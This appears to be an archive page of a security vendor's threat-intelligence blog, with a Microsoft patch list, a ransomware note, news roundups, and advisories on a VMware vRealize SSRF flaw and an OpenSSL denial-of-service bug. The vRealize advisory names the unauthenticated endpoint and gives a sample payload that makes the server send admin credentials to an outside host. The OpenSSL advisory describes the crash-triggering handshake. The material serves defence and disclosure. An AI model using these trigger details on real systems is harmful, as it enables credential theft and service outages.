Threat Intelligence Archives | Page 29 of 183

Microsoft Security Bulletin Coverage for April 2021

April 13, 2021/in Threat intelligence /by Security News

SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of April 2021. A list of issues reported, along with SonicWall coverage information are as follows:

CVE-2021-28310 Win32k Elevation of Privilege Vulnerability
ASPY 173 Malformed-File exe.MP.175

CVE-2021-28324 Windows SMB Information Disclosure Vulnerability
ASPY 175 Malformed-File exe.MP.178

CVE-2021-28325 Windows SMB Information Disclosure Vulnerability
ASPY 176 Malformed-File exe.MP.179

CVE-2021-28442 Windows TCP/IP Information Disclosure Vulnerability
ASPY 174 Malformed-File exe.MP.177

Following vulnerabilities do not have exploits in the wild :

CVE-2021-26413 Windows Installer Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2021-26415 Windows Installer Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-26416 Windows Hyper-V Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2021-26417 Windows Overlay Filter Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2021-27064 Visual Studio Installer Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-27067 Azure DevOps Server and Team Foundation Server Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2021-27072 Win32k Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-27079 Windows Media Photo Codec Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2021-27086 Windows Services and Controller App Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-27088 Windows Event Tracing Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-27089 Microsoft Internet Messaging API Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-27090 Windows Secure Kernel Mode Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-27091 RPC Endpoint Mapper Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-27092 Azure AD Web Sign-in Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2021-27093 Windows Kernel Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2021-27094 Windows Early Launch Antimalware Driver Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2021-27095 Windows Media Video Decoder Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-27096 NTFS Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-28309 Windows Kernel Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2021-28311 Windows Application Compatibility Cache Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2021-28312 Windows NTFS Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2021-28313 Diagnostics Hub Standard Collector Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-28314 Windows Hyper-V Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-28315 Windows Media Video Decoder Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-28316 Windows WLAN AutoConfig Service Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2021-28317 Microsoft Windows Codecs Library Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2021-28318 Windows GDI+ Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2021-28319 Windows TCP/IP Driver Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2021-28320 Windows Resource Manager PSM Service Extension Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-28321 Diagnostics Hub Standard Collector Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-28322 Diagnostics Hub Standard Collector Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-28323 Windows DNS Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2021-28326 Windows AppX Deployment Server Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2021-28327 Remote Procedure Call Runtime Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-28328 Windows DNS Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2021-28329 Remote Procedure Call Runtime Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-28330 Remote Procedure Call Runtime Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-28331 Remote Procedure Call Runtime Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-28332 Remote Procedure Call Runtime Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-28333 Remote Procedure Call Runtime Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-28334 Remote Procedure Call Runtime Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-28335 Remote Procedure Call Runtime Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-28336 Remote Procedure Call Runtime Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-28337 Remote Procedure Call Runtime Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-28338 Remote Procedure Call Runtime Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-28339 Remote Procedure Call Runtime Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-28340 Remote Procedure Call Runtime Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-28341 Remote Procedure Call Runtime Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-28342 Remote Procedure Call Runtime Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-28343 Remote Procedure Call Runtime Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-28344 Remote Procedure Call Runtime Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-28345 Remote Procedure Call Runtime Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-28346 Remote Procedure Call Runtime Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-28347 Windows Speech Runtime Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-28348 Windows GDI+ Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-28349 Windows GDI+ Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-28350 Windows GDI+ Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-28351 Windows Speech Runtime Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-28352 Remote Procedure Call Runtime Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-28353 Remote Procedure Call Runtime Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-28354 Remote Procedure Call Runtime Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-28355 Remote Procedure Call Runtime Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-28356 Remote Procedure Call Runtime Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-28357 Remote Procedure Call Runtime Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-28358 Remote Procedure Call Runtime Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-28434 Remote Procedure Call Runtime Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-28435 Windows Event Tracing Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2021-28436 Windows Speech Runtime Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-28437 Windows Installer Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2021-28438 Windows Console Driver Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2021-28439 Windows TCP/IP Driver Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2021-28440 Windows Installer Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-28441 Windows Hyper-V Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2021-28443 Windows Console Driver Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2021-28444 Windows Hyper-V Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2021-28445 Windows Network File System Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-28446 Windows Portmapping Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2021-28447 Windows Early Launch Antimalware Driver Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2021-28448 Visual Studio Code Kubernetes Tools Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-28449 Microsoft Office Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-28450 Microsoft SharePoint Denial of Service Update
There are no known exploits in the wild.
CVE-2021-28451 Microsoft Excel Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-28452 Microsoft Outlook Memory Corruption Vulnerability
There are no known exploits in the wild.
CVE-2021-28453 Microsoft Word Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-28454 Microsoft Excel Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-28456 Microsoft Excel Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2021-28457 Visual Studio Code Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-28458 Azure ms-rest-nodeauth Library Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-28459 Azure DevOps Server and Team Foundation Services Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2021-28460 Azure Sphere Unsigned Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-28464 VP9 Video Extensions Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-28466 Raw Image Extension Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-28468 Raw Image Extension Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-28469 Visual Studio Code Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-28470 Visual Studio Code GitHub Pull Requests and Issues Extension Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-28471 Remote Development Extension for Visual Studio Code Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-28472 Visual Studio Code Maven for Java Extension Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-28473 Visual Studio Code Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-28475 Visual Studio Code Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-28477 Visual Studio Code Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-28480 Microsoft Exchange Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-28481 Microsoft Exchange Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-28482 Microsoft Exchange Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-28483 Microsoft Exchange Server Remote Code Execution Vulnerability
There are no known exploits in the wild.

SSRF, vRealize Operations Manager API

April 9, 2021/in Threat intelligence /by Security News

Overview:

VMware vRealize Operations Manager delivers intelligent operations management with application-to-storage visibility across physical, virtual, and cloud infrastructures. CVE-2021-21975 is an unauthenticated server-side request forgery (SSRF) vulnerability in VMware vRealize Operations API. The vulnerability was privately reported to VMware. Patches and Workarounds are available to address the vulnerability in impacted VMware products below. VMware has evaluated this issue to be of ‘Important’ severity with a maximum CVSSv3 base score of 8.6.

CVE Reference:

This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2021-21975

Common Vulnerability Scoring System (CVSS):

Base 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C):
• Access vector is NETWORK
• Access complexity is LOW
• Level of authentication required is NONE
• Impact of this vulnerability on data confidentiality is COMPLETE
• Impact of this vulnerability on data integrity is COMPLETE
• Impact of this vulnerability on data availability is COMPLETE
Temporal 7.8 (E:POC/RL:OF/RC:C):
• The exploitability level of this vulnerability is PROOF OF CONCEPT
• The remediation level of this vulnerability is OFFICIAL FIX
• The report confidence level of this vulnerability is CONFIRMED

Attack Behavior & Chain Reaction:

Performs a Server Side Request Forgery attack to steal administrative credentials.

Triggering the Vulnerability:

One of the REST API URIs vRealize Operations Manager supports is “/casa/nodes/thumbprints”, which is accessible without authentication due to the configuration in the casa-security-context.xml file:
(sec:http pattern=”/nodes/thumbprints” security=’none’)

On the server end, a function called getNodesThumbprints() is called to handle API request on the above URI. The HTTP payload for this request is an address array in JSON format, such as:
[“127.0.0.1:443”]

The vulnerability is due to a lack of sanitization of the incoming HTTP requests. When the server receives an HTTP POST request to the URI “/casa/nodes/thumbprints”, the vulnerable function getNodesThumbprints() will try to get the address array from the HTTP data payload and send HTTP request on URI “/casa/node/thumbprint” to these addresses.

If a URI was provided in the address value of the array, then the “/casa/node/thumbprint” will be appended on the
URI to send. For example, if following HTTP data payload was sent:
[“test.com:443/test/”]

Then the function getNodesThumbprints() will send URI “/test/casa/node/thumbprint” to test.com:443. Therefore, the attackers cannot fully control the URI for the forgery requests. It is noted that for versions before VMware vRealize Operations Manager 8.3, the server will send credential of account “maintenanceAdmin” in the Authorization header of the HTTP request.

A remote attacker could exploit the vulnerability by sending a crafted request to target server. Successful exploitation could result in stealing of administrative credentials in some versions of VMware vRealize Operations Manager.

Post Data:

Affected products:

vRealize Operations Manager
• 7.0.0
• 7.5.0
• 8.0.0, 8.0.1
• 8.1.0, 8.1.1
• 8.2.0
• 8.3.0
VMware Cloud Foundation (vROps)
• 3.x
• 4.x
vRealize Suite Lifecycle Manager (vROps)
• 8.x

SonicWall’s, (IPS) Intrusion Prevention System, provides protection against this threat:

• IPS: 15487 VMware vRealize Operations Manager API SSRF

Remediation Details:

• The file /usr/lib/vmware-casa/casa-webapp/logs/casa.log is of particular interest for tracking suspicious requests.
• KB83210
• KB83095
• KB83094
• KB83093
• KB82367
• KB83287

Click -> Knowledge Base Search

Appendix – Discovered By:

Egor Dimitrenko of Positive Technologies reported this vulnerability.

Uniwinnicrypt ransomware charges over $550k for file recovery

April 9, 2021/in Threat intelligence /by Security News

The SonicWall Capture Labs threat research team have been tracking a ransomware family named Uniwinnicrypt. This malware is aimed at large corporations and the operators charge over $550k USD in crypto (Monero and Bitcoin) for file recovery. A custom chat site hosted on the tOr network is provided by the operators for negotiations with their victims. However, conversations between the victims and operators are publicly accessible.

Infection cycle:

Upon infection, code is injected into grpconv.exe, iexpress.exe or write.exe. This code performs the encryption of files on the system:

The extension “.uniwinnicrypt” is appended to all encrypted files.

HOW_FIX_FILES.htm is dropped into all directories where files were encrypted. It contains the following message:

The tOr link leads to the following page:

After entering the requested information, the following existing conversation between a victim (not us) and the operator can be seen:

SonicWall Capture Labs provides protection against this threat via the following signature:

GAV: Uniwinnicrypt.RSM (Trojan)

This threat is also detected by SonicWALL Capture ATP w/RTDMI and the Capture Client endpoint solutions.

Cybersecurity News & Trends – 04-09-21

April 9, 2021/0 Comments/in Weekly News /by Amber Wolff

This week, educational institutions around the world found themselves the target of malware, as lawmakers faced pressure to increase protection for schools and universities.

SonicWall in the News

Keeping Tabs on IoT Security — Enterprise IT News

SonicWall Vice President of Regional Sales (APAC) Debasish Mukherjee was interviewed on the recent 2021 Cyber Threat Report.

Logically Buys MSSP Company, Sets Sights on $100M — TechTarget: SearchITChannel

This article mentions SonicWall’s strategic alliance with MSSP company Cerdant.

Industry News

European Institutions Were Targeted in a Cyberattack Last Week — Bloomberg

A spokesperson for the commission said that a number of EU bodies “experienced an IT security incident in their IT infrastructure.”

China Creates Its Own Digital Currency, a First for Major Economy — The Wall Street Journal

A cyber yuan stands to give Beijing power to track spending in real time. It also could soften the bite of U.S. sanctions.

US DoD Launches Vuln Disclosure Program for Contractor Networks — Security Week

The U.S. Department of Defense announced the launch of a new vulnerability disclosure program to identify vulnerabilities in Defense Industrial Base contractor networks.

Ransomware Hits TU Dublin and National College of Ireland — Bleeping Computer

The National College of Ireland is working on restoring IT services after being hit by a ransomware attack that forced the college to take IT systems offline.

FBI, CISA Warn Fortinet FortiOS Vulnerabilities Are Being Actively Exploited — ZDNet

APT groups are suspected of harnessing three bugs, two critical, for data exfiltration purposes.

University of California Victim of Ransomware Attack — The Hill

The university said in a statement that it — along with several other government agencies, private companies and other schools — has been involved in an attack involving Accellion, a secure file transfer company.

Malicious Cheats for Call of Duty: Warzone Are Circulating Online — Ars Technica

Activision said that a popular cheating site was circulating a fake cheat for “Call of Duty: Warzone” that contained a dropper, a type of backdoor that installs specific pieces of malware.

Malware Attack is Preventing Car Inspections in Eight U.S. States — Bleeping Computer

A malware attack on emissions testing company Applus Technologies is preventing vehicle inspections in Connecticut, Georgia, Idaho, Illinois, Massachusetts, Utah and Wisconsin.

As Ransomware Stalks the Manufacturing Sector, Victims Are Still Keeping Quiet — Cyberscoop

While competition from companies with cheap labor has long been an economic concern for U.S. manufacturers, cyberattacks have crept gradually into the equation.

Lawmakers Urge Education Department to Take Action to Defend Schools from Cyber Threats — The Washington Times

Representatives urged the Department of Education to prioritize protecting K-12 institutions from cyberattacks, which have shot up in the past year as classes moved increasingly online.

Feds Say Man Broke Into Public Water System and Shut Down Safety Processes — Ars Technica

The indictment underscores the potential for remote intrusions to have fatal consequences.

Ransomware Gang Wanted $40 Million in Florida Schools Cyberattack — Bleeping Computer

Fueled by large payments from victims, ransomware gangs have started to demand ridiculous ransoms from organizations that cannot afford them.

U.S. DOJ: Phishing Attacks Use Vaccine Surveys to Steal Personal Info — Bleeping Computer

The U.S. Department of Justice warned of phishing attacks using fake post-vaccine surveys to steal money or trick people into handing over their personal information.

In Case You Missed It

The Definitive Guide to SASE — Sony Kogin
SonicWall Named Silver Partner of the Year by CDW Canada — Amber Wolff
Expanding the Trophy Case: SonicWall Attains 5-Star Rating in 2021 CRN Partner Program Guide — Lindsey Lockhart
Does Your Network Need a Watchman? — Osca St. Marthe
Accelerated SonicWall Portfolio Expansion Delivers Enterprise-Grade Protection, Lower TCO — Atul Dhablania

March 2021 OpenSSL Vulnerability

April 2, 2021/in Threat intelligence /by Security News

Overview:

A denial of service vulnerability has been reported in OpenSSL library. An OpenSSL TLS server may crash if a remote attacker sends a maliciously crafted renegotiation ClientHello message (the exploit) from a client. If a TLSv1.2 renegotiation ClientHello omits the signature_algorithms extension (where it was present in the initial ClientHello), but includes a signature_algorithms_cert extension then a NULL pointer dereference will result, leading to a crash and a denial of service attack. A server is only vulnerable if it has TLSv1.2 and renegotiation enabled (which is the default configuration). OpenSSL TLS clients are not impacted by this issue. All OpenSSL 1.1.1 versions are affected by this issue.

CVE Reference:

This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2021-3449,
dated 2021-03-17.

Common Vulnerability Scoring System (CVSS):

The overall CVSS score is 6.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:U/RL:O/RC:C).

Base score is 7.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H), based on the following metrics:
• Attack vector is network.
• Attack complexity is low.
• Privileges required is none.
• User interaction is none.
• Scope is unchanged.
• Impact of this vulnerability on data confidentiality is none.
• Impact of this vulnerability on data integrity is none.
• Impact of this vulnerability on data availability is high.
Temporal score is 6.5 (E:U/RL:O/RC:C), based on the following metrics:
• The exploit code maturity level of this vulnerability is unproven.
• The remediation level of this vulnerability is official fix.
• The report confidence level of this vulnerability is confirmed.

Technical Overview:

The primary goal of the SSL protocol, Secure Socket Layer (SSL) is to provide privacy and reliability between two communicating applications and the primary goal of the TLS protocol, Transport Layer Security (TLS) is to provide a secure channel between two communicating peers. Both protocols are cryptographic protocols that provide authentication, confidentiality and data integrity for communication over TCP/IP networks. By using cryptographic algorithms such as symmetric key ciphers, cryptographically secure hash functions, and asymmetric cryptography, also known as public-key cryptography, is a process that uses a pair of related keys; one public key and one private key; to encrypt and decrypt a message and protect it from unauthorized access or use. The listed protocols enable hosts to communicate securely over insecure networks.

Triggering the Problem:

• The target must have a vulnerable version of the product running, with TLS 1.2 enabled.
• The target application must have TSL renegotiation enabled.
• The attacker must have network connectivity to the vulnerable application.

Triggering Conditions:

The attacker sends a TLS 1.2 Client Hello handshake message containing a non-empty signature_algorithms extension, then renegotiates with an empty signature_algorithms extension but non-empty signature_algorithms_cert extension. The vulnerability is triggered when the server processes the new Client Hello message.

Attack Delivery:

The following application protocols can be used to deliver an attack that exploits this vulnerability:
• TLS
• HTTPS, over ports 443/TCP, 8443/TCP
• SMTP, over ports 25/TCP, 587/TCP

Patched Software:

SonicWall’s, (IPS) Intrusion Prevention System, provides protection against this threat:

• IPS: 15483 “Client Renegotiation within Short Period”

Remediation Details:

The risks posed by this vulnerability can be mitigated or eliminated by:
• Upgrading to the patched releases to eliminate the vulnerability.
• Disabling TLS 1.2 version in OpenSSL.
• Disabling renegotiation if it was not needed.
The vendor has released the following advisory regarding this vulnerability:
Open SSL News Advisory

Appendix – Discovered By:

This issue was reported to OpenSSL on 18th March 2021 by Benjamin Kaduk from Akamai and was discovered by Xiang Ding and others at Akamai. The fix was developed by Tomáš Mráz.

Cybersecurity News & Trends – 04-02-21

April 2, 2021/0 Comments/in Weekly News /by Amber Wolff

This week, as lawmakers and researchers continued to unravel the details of the SolarWinds attack, another supply chain attack was uncovered — this time on PHP’s Git repository.

SonicWall in the News

Lacombe County fends off cyberattack — Red Deer Advocate

An attempted cyberattack on Lacombe County’s servers was ultimately prevented by the county’s SonicWall firewall.

2021 Partner Program Guide — CRN

SonicWall was recognized on a list of vendors who have 5-star channel partner programs.

SonicWall continues next-gen firewall refresh with NSa 3700 — Channelbuzz.ca

This article is about the new NSa 3700 firewall and next-gen upgrades from the March 25 launch, and features key quotes from Kayvon Sadeghi about the importance of this upgrade.

SonicWall expands its threat protection to protect heavily targeted sectors with the NSa 3700 — CRN India

This article is about the new NSa 3700 firewall and next-gen upgrades from the March 25 launch.

Leading Israeli IoT firm lands in US as worldwide malware attacks surge — ComputerWeekly

This article used data from SonicWall’s 2021 Cyber Threat Report to showcase the increase in malware and IoT attacks as the number of consumer-oriented IoT devices grows.

News Bits: SonicWall, Scality, Alluxio, Aerospike, Hammerspace, StarWind, Model9, & More — Storage Review

This article mentions the new NSa 3700 firewall and next-gen upgrades from the March 25 launch, and features key quotes from Kayvon Sadeghi about the importance of this upgrade.

2020 offered a ‘perfect storm’ for cybercriminals with ransomware attacks costing the industry $21B — Fierce Healthcare

This article used data from SonicWall’s 2021 Cyber Threat Report to showcase the increase in ransomware attacks on healthcare organizations.

Managed Security Services Provider (MSSP) News: 25 March 2021 — MSSP Alert

This article mentions about the new NSa 3700 firewall and next-gen upgrades from the March 25 launch

SonicWall Announces Security Hardware and Software Upgrades — ChannelPro Network

This article is about the new NSa 3700 firewall and next-gen upgrades from the March 25 launch, and features key quotes from Kayvon Sadeghi about the importance of this upgrade.

Industry News

North Korean hackers return, target infosec researchers in new operation — Ars Technica

North Korean government-sponsored hackers are back, this time with a new batch of social media profiles and a fake company that claims to offer offensive security services.

Ransomware tops U.S. cyber priorities, Homeland secretary says — Reuters

DHS Secretary Alejandro Mayorkas said that dealing with ransomware will be a top priority, highlighting the growing threat of the data-scrambling software.

U.S. to publish details on suspected Russian hacking tools used in SolarWinds espionage — Cyberscoop

The upcoming report sheds light on a historic espionage campaign that U.S. officials have, at times, been cautious to publicly detail.

Ubiquiti confirms extortion attempt following security breach — Cyberscoop

Networking device maker Ubiquiti has confirmed that it was the target of an extortion attempt following a January security breach, as revealed by a whistleblower earlier this week.

Whistleblower: Ubiquiti Breach “Catastrophic” — Krebs on Security

On Jan. 11, Ubiquiti, Inc. — a major vendor of IoT devices such as routers, network video recorders and security cameras — disclosed that a breach involving a third-party cloud provider had exposed customer account credentials.

Cybercriminals Publish Data Allegedly Stolen From Shell, Multiple Universities — Bleeping Computer

The FIN11 hacking group has published files that were allegedly stolen from oil and gas giant Shell, likely during a cybersecurity incident involving Accellion’s File Transfer Appliance (FTA) file sharing service.

Australia investigates reported hacks aimed at parliament, media — Cyberscoop

An apparent cyber incident knocked Australia’s Parliament House’s email system offline just as Australia’s Channel Nine broadcasting was interrupted by hackers over the weekend.

And that’s yet another UK education body under attack from ransomware: Servers, email, phones yanked offline — The Register

The Harris Federation, a not-for-profit charity responsible for running 50 primary and secondary academies in London and Essex, has become the latest UK education body to fall victim to ransomware.

PHP’s Git server hacked to add backdoors to PHP source code — Cyberscoop

In the latest software supply chain attack, the official PHP Git repository was hacked and tampered with.

Ukraine Investigating Phishing Software Used to Target Banks — Bloomberg

Phishing software was used to attack hundreds of banks and their clients in 11 countries, including the U.K, the U.S. and Mexico, the country’s Office of the Prosecutor General said in a statement.

More Ransomware Gangs Targeting Vulnerable Exchange Servers — Security Week

The Black Kingdom/Pydomer ransomware operators have joined the ranks of threat actors targeting the Exchange Server vulnerabilities that Microsoft disclosed in early March.

Ransomware admin is refunding victims their ransom payments — Bleeping Computer

After recently announcing the end of the operation, the administrator of Ziggy ransomware is now stating that they will also give the money back.

FBI exposes weakness in Mamba ransomware, DiskCryptor — Bleeping Computer

An alert from the U.S. Federal Bureau of Investigation about Mamba ransomware reveals a weak spot in the encryption process that could help targeted organizations recover from the attack without paying the ransom.

In Case You Missed It

SonicWall Named Silver Partner of the Year by CDW Canada — Amber Wolff
Expanding the Trophy Case: SonicWall Attains 5-Star Rating in 2021 CRN Partner Program Guide — Lindsey Lockhart
Does Your Network Need a Watchman? — Osca St. Marthe
Accelerated SonicWall Portfolio Expansion Delivers Enterprise-Grade Protection, Lower TCO — Atul Dhablania
Capture Client 3.6: Big Sur, But Safer — Brook Chelmo
New SonicWall NSa 3700: The Latest Next-Generation Firewall for Medium Enterprises — Ajay Uggirala
Announcing Wireless Network Manager for Unified Wired and Wireless Management — Srudi Dineshan
NSM On-Prem vs. NSM SaaS: Which Is Best for You? — Suriti Singh
CSa 1.2: Advanced, Closed-Network Threat Protection — Brook Chelmo

Cybersecurity News & Trends – 03-26-21

March 26, 2021/0 Comments/in Weekly News /by Amber Wolff

This week — with higher education institutions and electricity companies on high alert, and with the Microsoft Exchange server crisis raging on — it’s no wonder 82% say cyberterrorism is America’s top potential threat.

SonicWall in the News

IoT malware attacks saw a huge rise last year — Techradar

As the number of consumer-oriented IoT devices grows, data from SonicWall’s 2021 Cyber Threat Report suggests, IoT malware has been on the rise.

Phishing Email Warning Shows Cybercriminals Seizing on Tax Filing Delay, Vaccine Rollout Gallery — Channel Futures

Dmitriy Ayrapetov explains how bad actors are targeting vaccine distribution and takes a closer look at the threats caused by the remote workforce.

ICYMI: Our Channel News Roundup For the Week of March 15 — ChannelPro Network

SonicWall’s 2021 Cyber Threat Report was included in ChannelPro Network’s weekly news roundup.

India Saw Largest Spike In Malware Attacks In 2020: Report — ET CISO

This article features the findings from SonicWall’s 2021 Cyber Threat Report.
* The article was syndicated on ET Government, ET Telecom, ET CIO and Telecom Live

A Pandemic Of Email Scams — Financial Times

SonicWall recently reported a 62% increase in ransomware attacks last year and a 74% increase in malware variants.

New SonicWall 2020 Research Shows Cyber Arms Race At Tipping Point — CIO Review India

This article spotlights SonicWall’s 2021 Cyber Threat Report.

Industry News

Lawmakers reintroduce legislation to secure internet-connected devices — The Hill

The Cyber Shield Act would create a voluntary cybersecurity certification program for IoT devices.

Ransomware operators are piling on already hacked Exchange servers — Ars Technica

The fallout from the Microsoft Exchange server crisis isn’t abating just yet.

Purple Fox Malware Targets Windows Machines With New Worm Capabilities — Threat Post

A new infection vector from the established malware puts internet-facing Windows systems at risk from SMB password brute-forcing.

Thousands of Exchange servers breached prior to patching, CISA boss says — Cyberscoop

A U.S. government cybersecurity official has warned organizations not to have a false sense of security when it comes to vulnerabilities in Microsoft Exchange Server software, noting that “thousands” of computer servers with updated software had already been breached.

Covid-19: Vaccines and vaccine passports being sold on darknet — BBC

Researchers say they have seen a “sharp increase” in vaccine-related darknet adverts, while the BBC has been unable to determine whether the vaccines being sold there are real.

UK colleges and unis urged to prepare for ransomware before it’s too late — The Register

There’s been an uptick in attacks since schools reopened, warns National Cyber Security Centre

Electricity Distribution Systems at Increasing Risk of Cyberattacks, GAO Warns — Security Week

A newly published report form the U.S. Government Accountability Office describes the risks of cyberattacks on the electricity grid’s distribution systems, along with the scale of the potential impact of such attacks.

8 in 10 say cyberterrorism is top potential threat: Gallup — The Hill

According to the survey, 82% of respondents said cyberterrorism is a critical threat to the U.S.

TikTok Doesn’t Pose Overt U.S. National Security Threat, Researchers Say — The New York Times

A new study by university cybersecurity researchers found that the computer code underlying the TikTok app doesn’t pose an overt national security threat to the U.S.

Acer reportedly targeted with $50 million ransomware attack — ZDNet

The REvil ransomware gang has published various Acer documents, such as financial spreadsheets, bank balances and bank communications.

FBI warns of BEC attacks increasingly targeting US govt orgs — Bleeping Computer

The Federal Bureau of Investigation is warning U.S. private sector companies about an increase in business email compromise (BEC) attacks targeting state, local, tribal, and territorial (SLTT) government entities.

Microsoft Defender Antivirus now automatically mitigates Exchange Server vulnerabilities — ZDNet

Mitigation fixes will be applied automatically in a renewed effort by Microsoft to contain security incidents caused by the bugs.

SolarWinds-linked hacking group SilverFish abuses enterprise victims for sandbox tests — ZDNet

Existing victim networks are used as a novel form of sandbox, as cybercriminals exploit them to test out payloads.

In Case You Missed It

Accelerated SonicWall Portfolio Expansion Delivers Enterprise-Grade Protection, Lower TCO — Atul Dhablania
Capture Client 3.6: Big Sur, But Safer — Brook Chelmo
New SonicWall NSa 3700: The Latest Next-Generation Firewall for Medium Enterprises — Ajay Uggirala
Announcing Wireless Network Manager for Unified Wired and Wireless Management — Srudi Dineshan
NSM On-Prem vs. NSM SaaS: Which Is Best for You? — Suriti Singh
CSa 1.2: Advanced, Closed-Network Threat Protection — Brook Chelmo
Hafnium Uses Zero-Day Vulnerabilities Against Microsoft Exchange: What to Do Next — SonicWall Staff

China’s “Winnti” Spyder Module

